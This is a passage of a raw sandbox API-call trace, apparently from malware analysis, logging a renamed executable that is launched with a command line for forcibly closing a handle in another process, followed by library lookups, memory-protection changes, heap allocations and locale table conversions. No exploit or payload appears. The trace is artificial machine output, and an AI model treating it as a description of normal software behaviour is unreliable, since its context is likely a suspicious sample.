lpProcName="GetSysColorBrush") returned 0x771535a4 [0193.972] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0193.972] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0193.972] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0193.972] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0193.973] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0193.973] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0193.973] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0193.973] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0193.974] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0193.980] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x2cb67840, dwHighDateTime=0x1d68287)) [0193.980] GetCurrentThreadId () returned 0xa28 [0193.980] GetCurrentProcessId () returned 0xa38 [0193.980] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=31431910715) returned 1 [0193.985] GetProcessHeap () returned 0x5b0000 [0194.221] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0194.221] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0194.222] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0194.222] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0194.223] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0194.223] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0194.223] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0194.223] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0194.224] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0194.224] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0194.224] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0194.224] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0194.225] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0194.225] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0194.225] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0194.225] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0194.226] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0194.226] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0194.226] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0194.227] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0194.227] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0194.227] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0194.227] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0194.227] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0194.227] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0194.227] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0194.228] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0194.228] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0194.228] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0194.228] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0194.228] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0194.229] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0194.229] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0194.229] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0194.244] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3bc) returned 0x5c60c8 [0194.244] GetCurrentThreadId () returned 0xa28 [0194.244] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x18) returned 0x5c6490 [0194.244] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x800) returned 0x5c64b0 [0194.245] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c 14C -y -p 2880 -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x7c1c1f57, hStdError=0x0)) [0194.245] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0194.245] GetFileType (hFile=0x3) returned 0x2 [0194.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0194.733] GetFileType (hFile=0x7) returned 0x2 [0194.733] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0194.733] GetFileType (hFile=0xb) returned 0x2 [0194.734] GetCommandLineW () returned="tdq963ii.exe -accepteula -c 14C -y -p 2880 -nobanner" [0194.734] GetEnvironmentStringsW () returned 0x5c6cb8* [0194.734] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb86) returned 0x5c7848 [0194.737] FreeEnvironmentStringsW (penv=0x5c6cb8) returned 1 [0194.738] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0194.738] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x8e) returned 0x5c6cb8 [0194.741] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa0) returned 0x5c6d50 [0194.741] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3e) returned 0x5c83f0 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6c) returned 0x5c6df8 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x6e) returned 0x5c6e70 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x78) returned 0x5bf8e8 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x62) returned 0x5c6ee8 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c6f58 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5c6f90 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2a) returned 0x5c6fe0 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x28) returned 0x5c7018 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1a) returned 0x5c5a98 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x4a) returned 0x5c7048 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x72) returned 0x5bf968 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c70a0 [0195.313] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c70d8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1c) returned 0x5c5ac0 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xd2) returned 0x5c7110 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x7c) returned 0x5c71f0 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5c7278 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3a) returned 0x5c8438 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x90) returned 0x5c72b8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5c7350 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c7380 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x36) returned 0x5c73b8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x48) returned 0x5c73f8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5c7448 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c8480 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x18) returned 0x5c74a8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x82) returned 0x5c74c8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5c7558 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x1e) returned 0x5c5ae8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2c) returned 0x5c7590 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5c75c8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x52) returned 0x5c7628 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2a) returned 0x5c7688 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x3c) returned 0x5c84c8 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x54) returned 0x5c76c0 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x24) returned 0x5c7720 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x30) returned 0x5c7750 [0195.314] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x8c) returned 0x5c7788 [0195.314] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7848 | out: hHeap=0x5b0000) returned 1 [0195.932] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x800) returned 0x5c7820 [0195.932] GetLastError () returned 0x0 [0195.932] SetLastError (dwErrCode=0x0) [0195.932] GetLastError () returned 0x0 [0195.933] SetLastError (dwErrCode=0x0) [0195.933] GetLastError () returned 0x0 [0195.933] SetLastError (dwErrCode=0x0) [0195.933] GetACP () returned 0x4e4 [0195.933] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x220) returned 0x5c8028 [0195.933] GetLastError () returned 0x0 [0195.933] SetLastError (dwErrCode=0x0) [0195.933] IsValidCodePage (CodePage=0x4e4) returned 1 [0195.933] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0195.933] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0195.936] GetLastError () returned 0x0 [0195.936] SetLastError (dwErrCode=0x0) [0195.936] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0195.938] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0195.938] GetLastError () returned 0x0 [0195.938] SetLastError (dwErrCode=0x0) [0195.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.938] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0195.938] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0195.939] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0195.939] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÇ\x1e\x1c|äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0195.939] GetLastError () returned 0x0 [0195.939] SetLastError (dwErrCode=0x0) [0195.939] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0195.939] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0195.939] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0195.939] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0195.939] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 